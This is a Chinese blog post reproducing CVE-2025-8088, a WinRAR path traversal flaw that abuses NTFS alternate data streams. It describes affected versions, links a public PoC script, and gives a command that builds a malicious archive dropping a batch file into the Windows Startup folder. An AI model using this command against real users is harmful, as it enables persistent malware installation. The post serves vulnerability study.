首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【漏洞复现】CVE-2025-8088|WinRAR 路径遍历漏洞

【漏洞复现】CVE-2025-8088|WinRAR 路径遍历漏洞

作者头像
信安百科
发布2025-09-02 11:36:16
发布2025-09-02 11:36:16
27000
代码可运行
举报
文章被收录于专栏:信安百科信安百科
运行总次数:0
代码可运行

0x00 前言

WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。

该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。

从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。

0x01 漏洞描述

攻击者利用windows的NTFS备用数据流(ADS)特性隐藏恶意文件,通过路径遍历漏洞绕过RAR验证。

当用户解压时,表面显示正常文件,实则恶意LNK/DLL/EXE文件被释放至系统关键目录(如启动项/临时文件夹),实现持久化攻击。攻击者还添加大量无效路径ADS干扰用户查看,极大增强了隐蔽性。

0x02 CVE编号

CVE-2025-8088

0x03 影响版本

WinRAR <= 7.12

0x04 漏洞复现

1、环境搭建

代码语言:javascript
代码运行次数:0
运行
复制
WinRAR版本7.12
CVE-2025-8088利用脚本poc.py
1.txt  正常的文本文件
a.bat  恶意脚本

2、复现过程

使用CVE-2025-8088利用脚本poc.py生成恶意压缩包文件。

POC:

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

命令如下:

代码语言:javascript
代码运行次数:0
运行
复制
python poc.py --decoy 1.txt --payload a.bat  --drop "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" --rar "C:\Program Files\WinRAR\rar.exe"

使用WinRAR解压恶意压缩包。

文件夹下成功解压出正常的文件,恶意脚本也出现在启动项目录。

0x05 参考链接

https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/

https://www.win-rar.com/singlenewsview.html?&tx_ttnews%5Btt_news%5D=283&cHash=ff1fa7198ad19261efb202dafd7be691

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-08-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档